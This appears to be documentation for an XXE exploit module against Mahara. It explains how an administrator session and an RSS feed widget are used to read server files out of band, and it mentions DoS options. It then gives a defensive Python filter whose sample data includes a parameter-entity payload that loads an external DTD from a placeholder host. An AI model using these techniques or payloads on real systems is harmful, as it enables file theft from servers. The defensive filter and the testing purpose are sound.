This module uses administrative privileges to create a new page and populate it with an RSS feed reader widget, which the module then exploits.

Use of this module requires that the user log into the target Mahara system with their browser proxied through Burp Suite, OWASP ZAP, or a similar intercepting proxy in order to obtain the necessary session key and session cookie. The user represented by that session information must be a system administrator within Mahara.

Mahara is a PHP-based application, so directory content enumeration is not possible; a specific target file (or a list of specific target files) must be specified. In addition, while both text and binary content can be retrieved, the maximum file size is limited to about 4 KB unless certain components on the target were compiled with nonstandard options.

This module uses Yunusov-Osipov-style out-of-band exploitation of a PHP-based application. As a result, it requires the use of an instance of She Wore A Mirrored Mask which is accessible (either directly, or via transparent TCP port-forwarding) to the target system.

This module will generally *not* be successful at sending XXE denial-of-service attacks (--dos-lulz or --dos-quad).
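
From the defending side, both the out-of-band technique and the entity-expansion variants above require the feed parser to accept a DTD in the fetched document. The following is an added example, not code from this module or from Mahara: a pre-parse filter that refuses feeds carrying a DOCTYPE, an external identifier or a parameter entity, including when the feed is re-encoded as UTF-16. The function name, the encoding allowlist and the sample feeds are assumptions constructed for illustration.

```python
import codecs
import re

# Encodings identified from the first bytes. UTF-32 BOMs are tested first
# because the UTF-32-LE BOM begins with the UTF-16-LE BOM.
_PREFIXES = [(codecs.BOM_UTF32_LE, "utf-32-le"), (codecs.BOM_UTF32_BE, "utf-32-be"),
             (codecs.BOM_UTF16_LE, "utf-16-le"), (codecs.BOM_UTF16_BE, "utf-16-be"),
             # BOM-less UTF-16, which parsers can autodetect from a leading "<?"
             (b"<\x00?\x00", "utf-16-le"), (b"\x00<\x00?", "utf-16-be")]
# Declared encodings in which the ASCII markup keywords keep their byte values.
_ASCII_COMPAT = {"utf-8", "us-ascii", "ascii", "iso-8859-1", "windows-1252"}
_ENC_DECL = re.compile(r"""<\?xml[^>]*?encoding\s*=\s*["']([A-Za-z0-9._-]+)["']""")
_CHECKS = [
    ("doctype", re.compile(r"<!DOCTYPE\b")),
    ("external-id", re.compile(r"<!(?:DOCTYPE|ENTITY)\b[^>\[]*?\b(?:SYSTEM|PUBLIC)\b")),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%\s")),
]

def inspect_feed(raw: bytes) -> list:
    """Return reasons to refuse a fetched feed before parsing; [] means none found."""
    # latin-1 never fails and keeps ASCII bytes intact, so it is a safe default.
    codec = next((c for p, c in _PREFIXES if raw.startswith(p)), "latin-1")
    try:
        text = raw.decode(codec)
    except UnicodeDecodeError:
        return ["undecodable"]                      # fail closed
    if codec == "latin-1":
        if "\x00" in text:                          # e.g. BOM-less UTF-32
            return ["undecodable"]
        decl = _ENC_DECL.search(text[:200])
        if decl and decl.group(1).lower() not in _ASCII_COMPAT:
            return ["unexpected-encoding"]          # this scan cannot follow it
    return [name for name, rx in _CHECKS if rx.search(text)]

# Constructed sample inputs (collector.example is a placeholder host).
CLEAN_FEED = (b'<?xml version="1.0" encoding="UTF-8"?>'
              b'<rss version="2.0"><channel><title>t</title></channel></rss>')
DTD_FEED = (b'<?xml version="1.0"?><!DOCTYPE rss ['
            b'<!ENTITY % ext SYSTEM "http://collector.example/ext.dtd"> %ext;]>'
            b'<rss version="2.0"/>')

if __name__ == "__main__":
    for label, body in [("clean", CLEAN_FEED), ("dtd", DTD_FEED),
                        ("dtd, utf-16", DTD_FEED.decode().encode("utf-16"))]:
        print(label, inspect_feed(body) or "accepted")
```

A filter like this complements, and does not replace, configuring the XML parser itself to refuse DTD loading and entity substitution.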